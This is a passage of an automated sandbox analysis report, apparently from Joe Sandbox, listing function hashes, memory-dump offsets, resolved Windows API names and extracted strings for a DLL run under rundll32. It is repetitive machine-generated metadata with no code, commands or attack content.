                                                                                                                                  • Opcode ID: 94432bfd2f8d95df277d2e9dbc6edac5d8f0baf28bc49a8a7a32c7f5d36230e7
                                                                                                                                  • Instruction ID: 5ab51ccc94a7dab44ec95765bb0b019680b649c223dae5af60e6b35ee96dccf9
                                                                                                                                  • Opcode Fuzzy Hash: 94432bfd2f8d95df277d2e9dbc6edac5d8f0baf28bc49a8a7a32c7f5d36230e7
                                                                                                                                  • Instruction Fuzzy Hash: C8925E37204A88C5EBA68B65C1503FD37A1FB49BC4F54C016EE9A1BBA5DF35CA5AC310
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_$Mpunctlocaleconv
                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+XxPp
                                                                                                                                  • API String ID: 3643605086-3606100449
                                                                                                                                  • Opcode ID: 2b3747df4bcc6815d0ca050ff0a1d26fc9399c5a2f48bb3d04cf2418fda5afce
                                                                                                                                  • Instruction ID: 15170c7321f925de93854cd2b60bf2d9794a6949502e19fd89cf563b34aba275
                                                                                                                                  • Opcode Fuzzy Hash: 2b3747df4bcc6815d0ca050ff0a1d26fc9399c5a2f48bb3d04cf2418fda5afce
                                                                                                                                  • Instruction Fuzzy Hash: 46927E37204A88C5EBA68B66D1503FD27A1FB49BC8F54C415EF5A1B7A1CF35CA9AC310
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct
                                                                                                                                  • String ID: 0123456789-+Ee
                                                                                                                                  • API String ID: 4240859931-1347306980
                                                                                                                                  • Opcode ID: d972bc5eca4d0b82fe2e94bffa6b7d9434b9e5222b7b794ba326fb571b0aa537
                                                                                                                                  • Instruction ID: 7fa30803b5596d2040c40fa2d6deab6b9b1eebdfa1222772e05d0cd440f79c75
                                                                                                                                  • Opcode Fuzzy Hash: d972bc5eca4d0b82fe2e94bffa6b7d9434b9e5222b7b794ba326fb571b0aa537
                                                                                                                                  • Instruction Fuzzy Hash: E882A032208A8886FBA68B65C1523FD37A1FB49BC4F54C416EF4A17B95DF39CA59C310
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct
                                                                                                                                  • String ID: 0123456789-+Ee
                                                                                                                                  • API String ID: 4240859931-1347306980
                                                                                                                                  • Opcode ID: 821b9d4d01ecd75d4b1e2aa44c8194800fa5c52a50f71f3b929308d42d9b6223
                                                                                                                                  • Instruction ID: 541b46e9ef04b4a6691a8844132f360519d1f98d966391b6e758a932985ee6d9
                                                                                                                                  • Opcode Fuzzy Hash: 821b9d4d01ecd75d4b1e2aa44c8194800fa5c52a50f71f3b929308d42d9b6223
                                                                                                                                  • Instruction Fuzzy Hash: CF829036204A888AFBA68B65C1503FD37A1FB49BC4F54D416EF4A17795EF34CA69C310
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $0123456789-$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
                                                                                                                                  • API String ID: 0-2198913001
                                                                                                                                  • Opcode ID: 788500d03a8e8ed5740f58eafa9c7274e13b0638dca434ae7f54c870b6c7dbd6
                                                                                                                                  • Instruction ID: f32b7c8f048831c043252e1b7934f5bf6f5d62d5681d89b22e6ff182950679f7
                                                                                                                                  • Opcode Fuzzy Hash: 788500d03a8e8ed5740f58eafa9c7274e13b0638dca434ae7f54c870b6c7dbd6
                                                                                                                                  • Instruction Fuzzy Hash: 18C2CF22B49A4286FB20CFA6D0602BD37A1FB45F85B449231DE5E17BA5EFBCE445C340
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InformationTimeZone
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 565725191-1684325040
                                                                                                                                  • Opcode ID: 25aa477e76f4055b09bd446a7b1b2da17507f2d2d17c222a63302eea670db2c0
                                                                                                                                  • Instruction ID: 00f5b7d947ab3a8c5525c813846f607b1d2022bf292fbb6fb1c8683093d01556
                                                                                                                                  • Opcode Fuzzy Hash: 25aa477e76f4055b09bd446a7b1b2da17507f2d2d17c222a63302eea670db2c0
                                                                                                                                  • Instruction Fuzzy Hash: 25E11032B086828AF7709FF6A8612B93794FB84799F446335EA4E43AC5CF7CE4418750
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_$Mpunct
                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                  • API String ID: 2786813426-2799312399
                                                                                                                                  • Opcode ID: 310c16e434c6fb425f377aa5a3344d56e60155a5009237bc210dd0dc5f72e661
                                                                                                                                  • Instruction ID: 5fe4dd189a2d79ce61165057c9ebb2e090cd9d14d433b9fec00325c66f72dead
                                                                                                                                  • Opcode Fuzzy Hash: 310c16e434c6fb425f377aa5a3344d56e60155a5009237bc210dd0dc5f72e661
                                                                                                                                  • Instruction Fuzzy Hash: F0129C36704A88C9FBA28F65D0507ED27A1EB49BC9F54C112EE8A1F789DF35CA49C350
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_$Mpunct
                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                  • API String ID: 2786813426-2799312399
                                                                                                                                  • Opcode ID: cc0dd99451e0eb2a4836ac02799361a5a9bcabcee1e262923024bb7c99d54d77
                                                                                                                                  • Instruction ID: f7f63c79d1b94fbb45dab63fbf242b30916648d9a31090d02f6495e4854cce8f
                                                                                                                                  • Opcode Fuzzy Hash: cc0dd99451e0eb2a4836ac02799361a5a9bcabcee1e262923024bb7c99d54d77
                                                                                                                                  • Instruction Fuzzy Hash: B9129036708A8889FB92CA75C4503EC3BB1A74ABD8F58C115EE491B796CF75CA4EC350
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: yxxxxxxx$yxxxxxxx
                                                                                                                                  • API String ID: 0-3283245749
                                                                                                                                  • Opcode ID: 7d9fa7265bc996f957563da1dd5862a03a90015394d3ce2fb4214068eaf7c381
                                                                                                                                  • Instruction ID: 96bb0052e805f84f3b082e87b541d621cfb1aaf0f07c8fbdf5a9d2f5560b2fe2
                                                                                                                                  • Opcode Fuzzy Hash: 7d9fa7265bc996f957563da1dd5862a03a90015394d3ce2fb4214068eaf7c381
                                                                                                                                  • Instruction Fuzzy Hash: C342E362B05B8582EE208B69D5982BE63A0FB44BE5F549339DFAD077D5DF78E081C300
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: utf-8$utf8
                                                                                                                                  • API String ID: 0-782216586
                                                                                                                                  • Opcode ID: 5c8a2b00930e2f7a18b3fc2fde5d45f0d464ceee0ebcf5cbc8d5aafa92ce447a
                                                                                                                                  • Instruction ID: ea4edbc2567cbde75b75c5eea532ba161f320a2d9e3f812b416ab37aa101010c
                                                                                                                                  • Opcode Fuzzy Hash: 5c8a2b00930e2f7a18b3fc2fde5d45f0d464ceee0ebcf5cbc8d5aafa92ce447a
                                                                                                                                  • Instruction Fuzzy Hash: 99D1A331B0868681FB74EFF2A9317BA2695FF80795F105635EE4E43A85EFBCE4018650
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b86157ba1437e25ff90c112611880fb949198c74eec9fb249c96254bbc697d5b
                                                                                                                                  • Instruction ID: cd3c2300727b0a54f4b99c5262173322527ff9707f5e07466086b05885594800
                                                                                                                                  • Opcode Fuzzy Hash: b86157ba1437e25ff90c112611880fb949198c74eec9fb249c96254bbc697d5b
                                                                                                                                  • Instruction Fuzzy Hash: AD82EB22B08A4251FA31EFA5E4A00F96750EF947F5F184335EA6D07AE9DF6CE942C740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: 8996560bcfa92c646806b7d33099c803cfa12234436812cabb9c656e3ce3456e
                                                                                                                                  • Instruction ID: 0c59cbc31332c9f785b9a5fc86537a91f3bc072149a795668683ef2cf8b8ccd3
                                                                                                                                  • Opcode Fuzzy Hash: 8996560bcfa92c646806b7d33099c803cfa12234436812cabb9c656e3ce3456e
                                                                                                                                  • Instruction Fuzzy Hash: 8AF1AD32B05B4196FB24DFA6E5602AD33A4FB48BC9B000235DE1E57BA5DF78E525C390
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4240859931-0
                                                                                                                                  • Opcode ID: 63fef931675e363a9749f96429758758dd3006f32cce81dee63d7a14f1cdfd87
                                                                                                                                  • Instruction ID: b4b31d92be3c4c8e502b6ea2e0a282e668397faed0ae34e767a83c581478e39b
                                                                                                                                  • Opcode Fuzzy Hash: 63fef931675e363a9749f96429758758dd3006f32cce81dee63d7a14f1cdfd87
                                                                                                                                  • Instruction Fuzzy Hash: FBC1A232B06A9899FB52CFB5C4013EC63B1BB5DB88F448111EE4967A99DF39C64EC340
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4240859931-0
                                                                                                                                  • Opcode ID: 9787ca75ca63df748a1499e8dd1c5abcefd6f6751ff6d03e7f7fc609e9ac6cfc
                                                                                                                                  • Instruction ID: 7c40f0623f709e12c7f828199f14d4f1bd29be792234f51f62a64cc8c6a646a4
                                                                                                                                  • Opcode Fuzzy Hash: 9787ca75ca63df748a1499e8dd1c5abcefd6f6751ff6d03e7f7fc609e9ac6cfc
                                                                                                                                  • Instruction Fuzzy Hash: B2C1A332B06E9889FB52CFB5D4017EC63B1BB59788F448511EE4967A89EF38C64EC340
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                  • Opcode ID: f89d0cd4bb0fd192fd544f51d60563079563efa4160fb70afde1a4246156f38b
                                                                                                                                  • Instruction ID: 86c1e4c2a260d22c372b26a19b02f8b93bc019dc7fcfc8f039e828ecd7292bba
                                                                                                                                  • Opcode Fuzzy Hash: f89d0cd4bb0fd192fd544f51d60563079563efa4160fb70afde1a4246156f38b
                                                                                                                                  • Instruction Fuzzy Hash: AF110567B096458AFB218F56D4606AC77A0FB60FB1F448239C669533C0CAB8D6D1C740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DebuggerPresenttry_get_function
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2161787604-0
                                                                                                                                  • Opcode ID: 28ebdc6c2a637fb53ad7e8d10132abff894cd7c522ca1664283100d6c8bc214f
                                                                                                                                  • Instruction ID: d369b93c86ee76ec876b3f00d181936de25f43b74412cd33c966604ad5925330
                                                                                                                                  • Opcode Fuzzy Hash: 28ebdc6c2a637fb53ad7e8d10132abff894cd7c522ca1664283100d6c8bc214f
                                                                                                                                  • Instruction Fuzzy Hash: 8111A161B0C24341FB70AED3B4612BE5294AF41792F185335EA4D8BB86CFACE8454260
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                  • Opcode ID: 636ca2e8d16714f8e9f5f800e23f672016befd2f66aaf1b834946735b8b5e2b1
                                                                                                                                  • Instruction ID: 78a5eb190ef1ea8984604acd834f8efde160629e2c3cf962485c0323d79bad7e
                                                                                                                                  • Opcode Fuzzy Hash: 636ca2e8d16714f8e9f5f800e23f672016befd2f66aaf1b834946735b8b5e2b1
                                                                                                                                  • Instruction Fuzzy Hash: 8E118F36B18A8482F720CB66E55836D77A0BB88BA4F540325DB6C47BD5CFBCD440C750
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                  • Opcode ID: 24b7c03dd498b83a0c65312b7ca5d6416278fe3ae171dc0d21f53bbd2bd45fa8
                                                                                                                                  • Instruction ID: a8e0a09d42db750b5a98a0871f43130b3195003a1cfff66c9f5e6ffd359f83b0
                                                                                                                                  • Opcode Fuzzy Hash: 24b7c03dd498b83a0c65312b7ca5d6416278fe3ae171dc0d21f53bbd2bd45fa8
                                                                                                                                  • Instruction Fuzzy Hash: 9901F973F0928646F7314FA6E4607BD76A5EB50BB5F418335D668572C4DFBC94808700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                  • Opcode ID: 54e845f288bb733845b9e48990bf8ae3552a07acab0f2229878fb48aa12d56e2
                                                                                                                                  • Instruction ID: 1422f4c26d677426f1376f76c998a672c8e1b4f4a66605db0b6c5b00acb22cd9
                                                                                                                                  • Opcode Fuzzy Hash: 54e845f288bb733845b9e48990bf8ae3552a07acab0f2229878fb48aa12d56e2
                                                                                                                                  • Instruction Fuzzy Hash: 29E01A2AF08A4A84EE34DFD1E8A4065336CBB44784F854636D80C93334DF3CE129EB04
                                                                                                                                  APIs
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,?,00000001800423DB,?,?,00000140,0000000180042AAB), ref: 000000018003541D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                  • Opcode ID: ef170b939dcdfe0a6fa8f39585badaf32e39fbe27d88ffb3e5b79058c9fef6a5
                                                                                                                                  • Instruction ID: a17f45a68611e7ce09ab532a4d12380a5d0071377e1487d1a7a9af1b51f9b2a3
                                                                                                                                  • Opcode Fuzzy Hash: ef170b939dcdfe0a6fa8f39585badaf32e39fbe27d88ffb3e5b79058c9fef6a5
                                                                                                                                  • Instruction Fuzzy Hash: 5EE0EC35A05A0C81F7C74B12FCD57C623A0A75D3C6FE19601E44C56A70CE7883DD8B00
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: yuv2yuvq: out-of-range matrix entry [%d] = %d (%.3f)
                                                                                                                                  • API String ID: 0-148861234
                                                                                                                                  • Opcode ID: 2c4204fbbe862159814e98aa42e07df5665e4c025c246ec07536e3330d50aefc
                                                                                                                                  • Instruction ID: d2eae275bee79c199599dbe7aa2fe4dbefbd67478abb9d49932a69b34236a354
                                                                                                                                  • Opcode Fuzzy Hash: 2c4204fbbe862159814e98aa42e07df5665e4c025c246ec07536e3330d50aefc
                                                                                                                                  • Instruction Fuzzy Hash: EAC19326E38F844ED2139B3550526B6A369AF7F6C5F16D313FA4B71E62DB34A1838700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                  • Opcode ID: 692cdf69a8af2ca06fa06deacd1959d792d6a01867b2755f0af50de4269ff097
                                                                                                                                  • Instruction ID: ab246caa81b9b41867d82b03e4a3355bd14f0454fcad544ed93f99036381ec9b
                                                                                                                                  • Opcode Fuzzy Hash: 692cdf69a8af2ca06fa06deacd1959d792d6a01867b2755f0af50de4269ff097
                                                                                                                                  • Instruction Fuzzy Hash: 1FC01262B0888583E5316794D49106A3230FF8070AF500130E54E52A91CD5CE5145F40
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                  • Opcode ID: e8c0ad89556ba9dcd585b874128fb0143d6e7aea8091f6a6b86a80fa4c4c7ff0
                                                                                                                                  • Instruction ID: 0ad025dfe84bc1381ae2a1477b44c5a155f15109cc484d5beb8ba4556413b25e
                                                                                                                                  • Opcode Fuzzy Hash: e8c0ad89556ba9dcd585b874128fb0143d6e7aea8091f6a6b86a80fa4c4c7ff0
                                                                                                                                  • Instruction Fuzzy Hash: 83815923B4E28646FBB88E97806067DA390AF01B46F94133DDD0E97685CFBDE845CB40
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                  • Opcode ID: 826cd064da79ca11da7c5a7f35c96355f8fdcfd1802eb9bae2af3f00da99aab4
                                                                                                                                  • Instruction ID: 96797d7885acbfea8ae1b90ce71816caf227369842004e665f96f3d530d5680b
                                                                                                                                  • Opcode Fuzzy Hash: 826cd064da79ca11da7c5a7f35c96355f8fdcfd1802eb9bae2af3f00da99aab4
                                                                                                                                  • Instruction Fuzzy Hash: 0D712323B8E24246FB788E96816027DA3D0AF41746F94173DCD4E8B7DACEBDE8458750
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,=
                                                                                                                                  • API String ID: 0-1203540430
                                                                                                                                  • Opcode ID: fe5ee7259a1993f3c479d73e0debbad082496a2ac679abba8852d48e5468e8d2
                                                                                                                                  • Instruction ID: 039da1c8b6219739978ed3749917bc04205dcbcdf5ca8ef72ea36b7da6ecebdc
                                                                                                                                  • Opcode Fuzzy Hash: fe5ee7259a1993f3c479d73e0debbad082496a2ac679abba8852d48e5468e8d2
                                                                                                                                  • Instruction Fuzzy Hash: 8E41D3E3B603182AE91BC6BA7E12FAD90029B52BF5C5093256D3906BC5F13C59CB9580
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                  • Opcode ID: 025061a446d99fa4a582877d23a1cf70bc94dbc301d1d2535e5616ce66c38c19
                                                                                                                                  • Instruction ID: 4049761c1b6233587fdd8b4a14b8c0dfa7642449976e35d47c7a57180bdde092
                                                                                                                                  • Opcode Fuzzy Hash: 025061a446d99fa4a582877d23a1cf70bc94dbc301d1d2535e5616ce66c38c19
                                                                                                                                  • Instruction Fuzzy Hash: E9612413B6E24746FAB88E9A807027FA3809F41746F94173DDD0A976C5CFBDE8418740
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                  • Opcode ID: e8910a66f3b4aad5195f3891a66debd1221f84e70e89721fcd9cb75ffcb3049c
                                                                                                                                  • Instruction ID: d8b42fe45910b252f1722b475ba2b0995bfacdcfe00146bddb20cc0c126064f0
                                                                                                                                  • Opcode Fuzzy Hash: e8910a66f3b4aad5195f3891a66debd1221f84e70e89721fcd9cb75ffcb3049c
                                                                                                                                  • Instruction Fuzzy Hash: 3C612321B4C28346FA788E9751603BFA391AF42746F280735DD0B9B7D5CEBDE8468701
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,=
                                                                                                                                  • API String ID: 0-1203540430
                                                                                                                                  • Opcode ID: 33d4d7e34787201e39c9991a04a014427dde3f5717439700d18cce60f76c9fff
                                                                                                                                  • Instruction ID: 25773c4bd6412297102f6d4fcc223398d9b2166fe448878bff6e86c87448bb34
                                                                                                                                  • Opcode Fuzzy Hash: 33d4d7e34787201e39c9991a04a014427dde3f5717439700d18cce60f76c9fff
                                                                                                                                  • Instruction Fuzzy Hash: 9A31CDE37603183AF91B86AA7E16FBD90029B52BF5C5493317D3906BC6F13C68CB8540
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
